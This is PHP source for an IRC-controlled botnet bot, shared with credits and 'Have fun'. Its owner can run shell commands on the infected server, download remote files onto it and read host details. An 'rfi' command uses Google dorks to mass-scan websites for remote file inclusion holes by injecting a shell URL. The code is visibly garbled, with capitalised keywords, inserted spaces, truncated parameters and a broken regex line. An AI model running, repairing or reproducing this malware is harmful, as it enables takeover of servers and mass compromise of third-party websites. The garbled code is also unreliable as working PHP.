<? Php
// Config ///////////////////////////////////// /////////////////////////////
$ Network = ""; // irc network address //
$ Port = 6667; // irc network port //
$ Channel = ""; // irc channel //
$ Channel_password = ""; // irc channel password //
$ Owner = ""; // owners nickname //
$ Owner_password = ""; // login password (MD5 Encoded )//
$ Trigger = "."; // bot trigger //
$ Max_results = 150; // maximum Google results //
// End config //////////////////////////////////// //////////////////////////
@ Set_time_limit (0 );
Function randName (){
$ Nickparts = Array ("gohan", "x4n4r", "c0la", "mari0", "johan", "rex", "r00tz", "smilee ", "sm4ck", "nigr", "sTench ");
$ Tmp = "";
For ($ I = 0; $ I <2; $ I ++ ){
$ Tmp = $ nickparts [mt_rand (0, count ($ nickparts)-1)]. mt_rand (1000,9999 );
}
Return $ tmp;
}
$ Sck = fsockopen ($ network, $ port, $ errno, $ errstr) or die ("Connection error:". $ errstr );
Function send ($ msg, $ ){
Global $ sck, $ nick;
Fputs ($ sck, "PRIVMSG". $ to. "". $ msg ."");
}
Function pong (){
Global $ sck;
$ Dat = @ fgets ($ sck, 1024 );
$ D = explode ("", $ dat );
If ($ d [0] = "PING "){
Fputs ($ sck, "PONG". $ d [1]);
}
$ Dat = "";
}
Function get_exec_function (){
$ Exec_functions = array ("popen", "exec", "shell_exec ");
$ Disabled_funcs = ini_get (disable_functions );
Foreach ($ exec_functions as $ f) if (strpos ($ disabled_funcs, $ f) === false) return $ f;
}
Function execute_command ($ exec_function, $ command, $ ){
If (! $ Exec_function ){
Send ("No execution functions...", $ );
}
Switch ($ exec_function ){
Case "popen": $ h = popen ($ command, "r"); while (! Feof ($ h) send (fgets ($ h), $ to); break;
Case "exec": exec ($ command, $ result); foreach ($ result as $ r) send ($ r, $ to); break;
Case "shell_exec": send (shell_exec ($ command), $ to); break;
}
}
Function get ($ url, $ out, $ ){
If (! $ O = fopen ($ out, "w "))
Send ("Unable to write file", $ );
Else {
If (! $ C = file_get_contents ($ url ))
Send ("Unable to open remote file", $ );
Else {
If (! Fwrite ($ o, $ c ))
Send ("Unable to save file", $ );
Else {
Send ("File saved", $ );
Fclose ($ o );
}
}
}
}
Function encodeDork ($ s ){
$ Tmp = "";
For ($ I = 0; $ I <strlen ($ s); $ I ++ ){
$ Tmp. = "& #". hexdec (bin2hex ($ s [$ I]). ";";
}
Return urlencode ($ tmp );
}
Function shellInject ($ url, $ bug, $ shell, $ search ){
$ Url = explode ("/", $ url );
$ Url = $ url [2];
$ Url = (strpos ($ url, "www ")! = False? "Http: //". $ url: "http: // www.". $ url). $ bug. $ shell ."?? ";
$ Ch = curl_init ($ url );
Curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, true );
Curl_setopt ($ ch, CURLOPT_HEADER, 0 );
Curl_setopt ($ ch, CURLOPT_TIMEOUT, 4 );
$ Ret = curl_exec ($ ch );
$ Httpcode = curl_getinfo ($ ch, CURLINFO_HTTP_CODE );
Curl_close ($ ch );
If ($ httpcode = 200 ){
If (strpos ($ ret, $ search )! = False ){
Return $ url;
}
}
Return false;
}
Function scan ($ dork, $ bug, $ shell, $ search, $ ){
Global $ max_results;
If (function_exists (curl_init )){
$ Ch = curl_init ("http://www.google.com/search? Q = ". encodeDork ($ dork)." & start = 0 ");
Curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, true );
Curl_setopt ($ ch, CURLOPT_HEADER, 0 );
$ Ret = curl_exec ($ ch );
Curl_close ($ ch );
Preg_match_all ("/of (about) * <B> ([d,] +) </B>/", $ ret, $ max );
$ Max = str_replace (",", "", $ max [2] [0]);
$ Max = $ max> $ max_results? $ Max_results: $ max;
$ I = 0;
While ($ I <$ max ){
$ Ch = curl_init ("http://www.google.com/search? Q = ". encodeDork ($ dork)." & start = ". $ I );
Curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, true );
Curl_setopt ($ ch, CURLOPT_HEADER, 0 );
$ Ret = curl_exec ($ ch );
Preg_match_all ("/
If (@ $ links [1]) {
Foreach ($ links [1] as $ l ){
$ Ret = shellInject ($ l, $ bug, $ shell, $ search );
If ($ ret! = False ){
Send ("[+] Shell found:". $ ret, $ );
}
}
}
Else {
Send ("No sites found", $ );
}
Curl_close ($ ch );
$ I = $ max> 10? $ I + = 10: $ I ++;
Send ("$ I scanned", $ );
Pong ();
}
}
Else {
Send ("cURL is not enabled", $ );
}
}
$ Nick = randName ();
Sleep (1 );
Fputs ($ sck, "USER". $ nick ."? * ". $ Nick." @ hotmail.com ");
Sleep (1 );
Fputs ($ sck, "NICK". $ nick ."");
$ Loggedin = false;
While (! Feof ($ sck )){
$ Dat = fgets ($ sck, 4096 );
$ D = explode ("", $ dat );
Preg_match_all ("/:(. + )! (. +) PRIVMSG (. +): $ trigger (w +) s * (. +) */", $ dat, $ cmd );
If ($ d [0] = "PING "){
Fputs ($ sck, "PONG". $ d [1]);
}
If (strpos ($ dat, "help register ")! = False ){
Fputs ($ sck, "JOIN". $ channel. "". $ channel_password ."");
}
If (preg_match ("/:(. + )!. + PRIVMSG. +:. VERSION (.)/", $ dat, $ v )){
Fputs ($ sck, "NOTICE ". $ v [1]. "". $ v [2]. "VERSION mIRC v6.3 haled Mardam-Bey ". $ v [2]. "");
}
If (@ $ cmd [4] [0]) {
$ From = $ cmd [1] [0];
$ From_host = $ cmd [2] [0];
$ To = $ cmd [3] [0] = $ nick? $ Cmd [1] [0]: $ cmd [3] [0];
$ Command = $ cmd [4] [0];
$ Args = $ cmd [5] [0];
If ($ from ==$ owner & $ loggedin = true ){
Switch ($ command ){
Case "cmd": execute_command (get_exec_function (), $ args, $ to); break;
Case "die": fputs ($ sck, "QUIT: partitioned Ed die from". $ from); die ();
Case "get": $ a = explode ("", $ args); get ($ a [0], $ a [1], $ to); break;
Case "inf": send ("Host:". $ _ SERVER [HTTP_HOST]. "Whoami:". @ exec (whoami), $ to); break;
Case "raw": fputs ($ sck, $ args. ""); break;
Case "rfi": $ a = explode ("", $ args );
If (count ($ a)> 3) {send ("Beginning RFI scan", $ to); scan ($ a [0], $ a [1], $ a [2], $ a [3], $ to); send ("RFI scan complete", $ );}
Else send ("Usage: (dork) (bug) (shell) (search)", $ );
Break;
Case "say": send ($ args, $ to); break;
Default: send ("Unknown command.", $ );
}
}
Elseif ($ from ==$ owner & $ loggedin == false ){
If ($ command = "login "){
If (md5 ($ args) ==$ owner_password ){
$ Loggedin = true;
Send ("User $ from successfully logged in.", $ );
}
Else {
Send ("Login failed.", $ );
}
}
}
}
$ Dat = "";
}
?>
Credits flyZ to: Array ("gohan", "x4n4r", "c0la", "mari0", "johan", "rex", "r00tz", "smilee ", "sm4ck", "nigr", "sTench ");
Have fun. =)